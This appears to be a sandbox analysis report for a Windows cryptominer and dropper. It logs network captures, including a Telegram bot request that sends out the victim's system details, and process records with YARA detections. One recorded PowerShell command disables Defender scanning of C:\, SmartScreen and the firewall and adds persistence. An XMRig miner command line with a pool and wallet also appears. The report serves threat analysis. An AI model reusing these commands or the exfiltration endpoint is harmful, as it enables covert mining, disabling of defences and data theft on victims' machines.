                                                                                                                                                            2022-07-07 07:51:12 UTC4222INData Raw: 31 a4 45 8a 0a 41 ef cf 0c 68 ca f7 52 27 60 6c b8 46 3f ac b0 8b ff dc fd 56 f0 dc 03 e9 70 51 c6 cc 3a 99 50 2d 7e 56 af 1f 38 9e 29 53 2d e7 40 ad 3e e9 6d aa 0c 6b 06 72 69 7a 43 d9 e5 0c ba ba 3c 64 cf e8 1b 29 f0 69 a8 83 be 45 49 7b a0 7d 02 d0 6b 14 ed 15 3e 95 eb ac 4f 19 41 69 fe 8e b1 50 e0 93 e1 50 56 a7 00 90 bf d9 20 b9 7f c5 48 a6 e1 16 b6 15 50 c5 4e c1 77 5b cd e7 a2 3f 13 f9 35 3c a4 0e b5 e1 ff fd 0b 24 38 c6 24 55 ae 5e cb be d5 89 48 19 67 38 0c d5 7e 50 76 3f b3 8b 14 06 a2 79 6f 2d 23 1e c4 dc 4b 7d bb ea e1 45 7c 38 7d f0 f6 2e 4f a6 c0 20 99 55 ae 14 2b 85 a2 e2 e7 cf 63 a2 8c ee b1 d7 17 43 fc 8a 9d d6 f9 db 93 27 5a 2b bf bb 77 ac 59 07 bb 66 df f3 f5 30 80 15 ec 3a 8f 07 f4 8b c0 58 a0 68 76 23 75 25 67 a2 97 1a ad ed 50 41 c5
                                                                                                                                                            Data Ascii: 1EAhR'`lF?VpQ:P-~V8)S-@>mkrizC<d)iEI{}k>OAiPPV HPNw[?5<$8$U^Hg8~Pv?yo-#K}E|8}.O U+cC'Z+wYf0:Xhv#u%gPA
                                                                                                                                                            2022-07-07 07:51:12 UTC4238INData Raw: a3 fa dc c5 12 e2 37 7d 3e 83 81 dc 2d 5e 63 92 ed dc 28 62 4e ac bc 81 21 5c 6f 76 3b b0 2c a1 a2 de 81 32 87 06 87 74 03 b0 95 ba ee 1a 79 b6 db eb ea 42 ea a0 d4 b1 00 88 84 f9 74 b1 17 b3 c3 33 30 1f b8 07 4d 9f 18 0f 44 3b 93 84 63 93 b8 10 67 ea 74 a4 55 eb e9 fa 40 bb 6b 7b 26 67 ba 13 2c 6f 57 c6 f4 7b f8 96 f5 fa b7 cb a7 f5 7e 7c 2e 72 5e c2 47 38 3c 46 b6 d2 58 6d e7 d0 10 40 ce 60 dc 8f f1 6f 4c 9f 3b 05 4c 15 f1 b0 38 22 14 24 c9 19 0d 69 9f 9d 1a e4 16 90 0b 88 3b 0a df a6 90 ae bc 56 7c 2f ed 03 cb 4b 6c e1 d7 a7 a5 cc c8 ce 4b 2d 8c 8c d0 34 0a af 5c f1 a1 3b 72 59 73 3a 07 ab 47 f7 fc 84 a5 cd c7 42 a8 df d3 4c 10 22 f9 0f 4a f1 26 0c 60 88 13 98 11 06 0f 97 1c 66 e4 25 78 4e af 0a 8a 19 f0 18 e9 d9 3d ec e2 c5 08 ba 18 fb c5 ed 0b a7 b6
                                                                                                                                                            Data Ascii: 7}>-^c(bN!\ov;,2tyBt30MD;cgtU@k{&g,oW{~|.r^G8<FXm@`oL;L8"$i;V|/KlK-4\;rYs:GBL"J&`f%xN=
                                                                                                                                                            2022-07-07 07:51:12 UTC4254INData Raw: f8 35 6a 62 fd e0 89 4d 1f 96 ce 0f 07 c1 5e 66 59 de 10 d5 9a 45 7d 43 99 88 88 d9 6d 16 2d 81 39 bf 68 73 b0 05 06 a7 3d e6 8b 02 65 fe eb a3 45 33 6d 3a 6c d1 52 92 fd 30 91 a7 ce c7 9a f0 cd 99 8d bf ea 24 80 0a 0d 40 64 91 7d 65 7a 1e e8 3e 4b 66 af 09 c5 d7 81 ee 31 28 0a 02 73 9f ef 6a b3 3f cd 3e 01 03 4f 7a ab 1c 13 07 32 c8 69 59 2c 75 5e 0f 65 75 0e b8 53 01 0b 72 8b 40 3c 38 7c 54 9a 5d fc f6 f8 6d 8c 56 5c 6a 3c 9b 7c 88 30 a6 0a df 8e b8 0c 5d 60 7f 5b 59 c8 d5 5e 8c 50 af 5d 67 d3 fc fa 6b 50 11 a8 e4 35 0b e1 87 f7 01 dc 87 ff 77 60 bc 13 68 7f 1c da ba 10 c2 09 eb 97 60 29 5e 36 31 c1 02 cc 9e 32 d6 01 5f b8 22 4c 1a 09 eb c9 66 04 23 47 f5 e9 96 b9 39 92 d4 f2 54 55 37 75 21 ac e7 49 5a cf b5 59 d2 4d 97 d7 b4 42 fd 1d c7 03 bf 8a 2b 0e
                                                                                                                                                            Data Ascii: 5jbM^fYE}Cm-9hs=eE3m:lR0$@d}ez>Kf1(sj?>Oz2iY,u^euSr@<8|T]mV\j<|0]`[Y^P]gkP5w`h`)^612_"Lf#G9TU7u!IZYMB+
                                                                                                                                                            2022-07-07 07:51:12 UTC4270INData Raw: 99 31 20 e9 19 0a dc ae 5b a8 13 70 ca ee aa aa 80 2c 17 56 d2 da 7a bc 08 aa 94 fc b3 fa 2b 9e df 06 0b e8 79 87 53 e6 50 a8 7c e5 57 f7 29 d9 7e 1b c7 e6 8e 63 ec eb 11 7c 11 99 b6 8e ea ca 00 fc 00 9e b1 d9 80 37 4e b2 ca 29 09 59 fb fc 63 0c e1 bf d4 88 db ee 14 14 92 3c 8b 46 3c c5 d8 53 b0 29 08 a1 54 fc e1 0d 8f a5 18 09 6e 09 a7 db 32 be 22 db 0f 8c 7a fa 1f b3 7d 12 e9 d5 10 c4 cc f1 51 c3 21 c8 23 3e 55 e5 cc 5b fd fc 8c d7 2b 5c da 93 c2 b1 ae 50 80 29 14 8a 17 cc 18 6a a9 17 35 be 59 86 58 82 ab e4 24 7c d5 54 47 f5 67 73 ce ad 85 c1 73 aa db 8f d4 bb e8 92 6b 40 5c b1 44 1f 67 90 11 d3 0f d0 6f f4 b9 f8 37 c6 61 b0 37 9c 94 13 a3 d8 bd d7 c8 6d 50 32 2f 6a d5 d2 fe 17 08 5a 65 68 e5 df 54 ec b5 81 0a 2f d1 bc 60 75 bb c5 ba 99 36 63 7f ba 4a
                                                                                                                                                            Data Ascii: 1 [p,Vz+ySP|W)~c|7N)Yc<F<S)Tn2"z}Q!#>U[+\P)j5YX$|TGgssk@\Dgo7a7mP2/jZehT/`u6cJ


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            4192.168.2.4497633.220.57.224443C:\ProgramData\MicrosoftNetwork\System.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-07-07 07:51:34 UTC4275OUTGET / HTTP/1.1
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.174 YaBrowser/22.1.2.834 Yowser/2.5 Safari/537.36
                                                                                                                                                            Host: api.ipify.org
                                                                                                                                                            2022-07-07 07:51:34 UTC4275INHTTP/1.1 200 OK
                                                                                                                                                            Server: Cowboy
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                            Vary: Origin
                                                                                                                                                            Date: Thu, 07 Jul 2022 07:51:34 GMT
                                                                                                                                                            Content-Length: 14
                                                                                                                                                            Via: 1.1 vegur
                                                                                                                                                            2022-07-07 07:51:34 UTC4275INData Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 39 32
                                                                                                                                                            Data Ascii: 102.129.143.92


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            5192.168.2.449765149.154.167.220443C:\Users\user\Desktop\DllHost.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-07-07 07:51:35 UTC4275OUTGET /bot5468819057:AAHRJabfvGnrMiNkuZj9RaE8-OjfRBxOw-4/sendMessage?chat_id=1327052997&text=New%20User:%20618321%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0AIP:%20102.129.143.92 HTTP/1.1
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.174 YaBrowser/22.1.2.834 Yowser/2.5 Safari/537.36
                                                                                                                                                            Host: api.telegram.org
                                                                                                                                                            2022-07-07 07:51:35 UTC4276INHTTP/1.1 200 OK
                                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                                            Date: Thu, 07 Jul 2022 07:51:35 GMT
                                                                                                                                                            Content-Type: application/json
                                                                                                                                                            Content-Length: 392
                                                                                                                                                            Connection: close
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                            2022-07-07 07:51:35 UTC4276INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 30 33 31 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 34 36 38 38 31 39 30 35 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 6f 70 61 74 61 4d 69 6e 65 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 6f 70 61 74 61 4d 69 6e 65 72 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 33 32 37 30 35 32 39 39 37 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 73 79 61 6e 79 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 65 6e 7a 65 6c 6f 71 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 37 31 38 30 32 39 35 2c 22 74 65 78 74 22 3a 22 4e 65 77 20 55 73
                                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":20310,"from":{"id":5468819057,"is_bot":true,"first_name":"LopataMiner","username":"LopataMiner_bot"},"chat":{"id":1327052997,"first_name":"Masyanya","username":"wenzeloq","type":"private"},"date":1657180295,"text":"New Us


                                                                                                                                                            Statistics

                                                                                                                                                            CPU Usage

                                                                                                                                                            Click to jump to process

                                                                                                                                                            Memory Usage

                                                                                                                                                            Click to jump to process

                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                            Behavior

                                                                                                                                                            Click to jump to process

                                                                                                                                                            System Behavior

                                                                                                                                                            General

                                                                                                                                                            Target ID:0
                                                                                                                                                            Start time:09:51:05
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Users\user\Desktop\DllHost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Users\user\Desktop\DllHost.exe"
                                                                                                                                                            Imagebase:0x7ff7191b0000
                                                                                                                                                            File size:451072 bytes
                                                                                                                                                            MD5 hash:6368031626DA1F0D51BCAC43104B123F
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:low

                                                                                                                                                            General

                                                                                                                                                            Target ID:1
                                                                                                                                                            Start time:09:51:05
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff647620000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Target ID:2
                                                                                                                                                            Start time:09:51:09
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
                                                                                                                                                            Imagebase:0x7ff6ba650000
                                                                                                                                                            File size:447488 bytes
                                                                                                                                                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Target ID:3
                                                                                                                                                            Start time:09:51:10
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff647620000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Target ID:4
                                                                                                                                                            Start time:09:51:15
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\ProgramData\Systemd\procexp.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline: --url pool.hashvault.pro:80 --user 42kFTbPkrpEY8KRSdRjzLpawdNvmR1BTKPRfaaGoq9TcDNhnKapy9G99eH9AsJon766YDYnKEobxycNSDuHbPG3JHV5zKut --pass x
                                                                                                                                                            Imagebase:0x7ff64b1d0000
                                                                                                                                                            File size:8305064 bytes
                                                                                                                                                            MD5 hash:2D9FB9ED8BEBB55280B81A4652DCFA11
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000004.00000000.283520535.00007FF64B7DC000.00000002.00000001.01000000.0000000A.sdmp, Author: Florian Roth
                                                                                                                                                            • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000004.00000000.283520535.00007FF64B7DC000.00000002.00000001.01000000.0000000A.sdmp, Author: Florian Roth
                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000004.00000000.283520535.00007FF64B7DC000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000004.00000000.284069730.00007FF64BCD5000.00000008.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\ProgramData\Systemd\procexp.exe, Author: Florian Roth
                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\ProgramData\Systemd\procexp.exe, Author: Joe Security
                                                                                                                                                            • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\ProgramData\Systemd\procexp.exe, Author: ditekSHen
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                            Reputation:low

                                                                                                                                                            General

                                                                                                                                                            Target ID:6
                                                                                                                                                            Start time:09:51:16
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /K taskkill /IM
                                                                                                                                                            Imagebase:0x7ff7bb450000
                                                                                                                                                            File size:273920 bytes
                                                                                                                                                            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Target ID:7
                                                                                                                                                            Start time:09:51:17
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                                                            Imagebase:0x7ff7338d0000
                                                                                                                                                            File size:51288 bytes
                                                                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Target ID:8
                                                                                                                                                            Start time:09:51:17
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff647620000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Target ID:10
                                                                                                                                                            Start time:09:51:18
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /K taskkill /IM procexp.exe /F && exit
                                                                                                                                                            Imagebase:0x7ff7bb450000
                                                                                                                                                            File size:273920 bytes
                                                                                                                                                            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Target ID:11
                                                                                                                                                            Start time:09:51:22
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\ProgramData\MicrosoftNetwork\System.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\ProgramData\MicrosoftNetwork\System.exe"
                                                                                                                                                            Imagebase:0x7ff6e4c40000
                                                                                                                                                            File size:451072 bytes
                                                                                                                                                            MD5 hash:6368031626DA1F0D51BCAC43104B123F
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\ProgramData\MicrosoftNetwork\System.exe, Author: Florian Roth
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                            • Detection: 26%, ReversingLabs
                                                                                                                                                            Reputation:low

                                                                                                                                                            General

                                                                                                                                                            Target ID:12
                                                                                                                                                            Start time:09:51:23
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:taskkill /IM
                                                                                                                                                            Imagebase:0x7ff7da910000
                                                                                                                                                            File size:94720 bytes
                                                                                                                                                            MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:moderate

                                                                                                                                                            General

                                                                                                                                                            Target ID:13
                                                                                                                                                            Start time:09:51:23
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff647620000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:14
                                                                                                                                                            Start time:09:51:24
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exit
                                                                                                                                                            Imagebase:0x7ff7bb450000
                                                                                                                                                            File size:273920 bytes
                                                                                                                                                            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:15
                                                                                                                                                            Start time:09:51:24
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff647620000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:16
                                                                                                                                                            Start time:09:51:28
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:taskkill /IM procexp.exe /F
                                                                                                                                                            Imagebase:0x7ff7da910000
                                                                                                                                                            File size:94720 bytes
                                                                                                                                                            MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:17
                                                                                                                                                            Start time:09:51:28
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff647620000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:18
                                                                                                                                                            Start time:09:51:28
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                                                                                            Imagebase:0x7ff7338d0000
                                                                                                                                                            File size:51288 bytes
                                                                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:19
                                                                                                                                                            Start time:09:51:28
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
                                                                                                                                                            Imagebase:0x7ff7bb450000
                                                                                                                                                            File size:273920 bytes
                                                                                                                                                            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:20
                                                                                                                                                            Start time:09:51:29
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff647620000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:21
                                                                                                                                                            Start time:09:51:31
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /K taskkill /IM procexp.exe /F && exit
                                                                                                                                                            Imagebase:0x7ff7bb450000
                                                                                                                                                            File size:273920 bytes
                                                                                                                                                            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:22
                                                                                                                                                            Start time:09:51:31
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                            Imagebase:0x7ff7338d0000
                                                                                                                                                            File size:51288 bytes
                                                                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:23
                                                                                                                                                            Start time:09:51:31
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff647620000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:24
                                                                                                                                                            Start time:09:51:32
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
                                                                                                                                                            Imagebase:0x7ff7bb450000
                                                                                                                                                            File size:273920 bytes
                                                                                                                                                            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:25
                                                                                                                                                            Start time:09:51:33
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:taskkill /IM procexp.exe /F
                                                                                                                                                            Imagebase:0x7ff7da910000
                                                                                                                                                            File size:94720 bytes
                                                                                                                                                            MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:26
                                                                                                                                                            Start time:09:51:33
                                                                                                                                                            Start date:07/07/2022
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff647620000
                                                                                                                                                            File size:625664 bytes
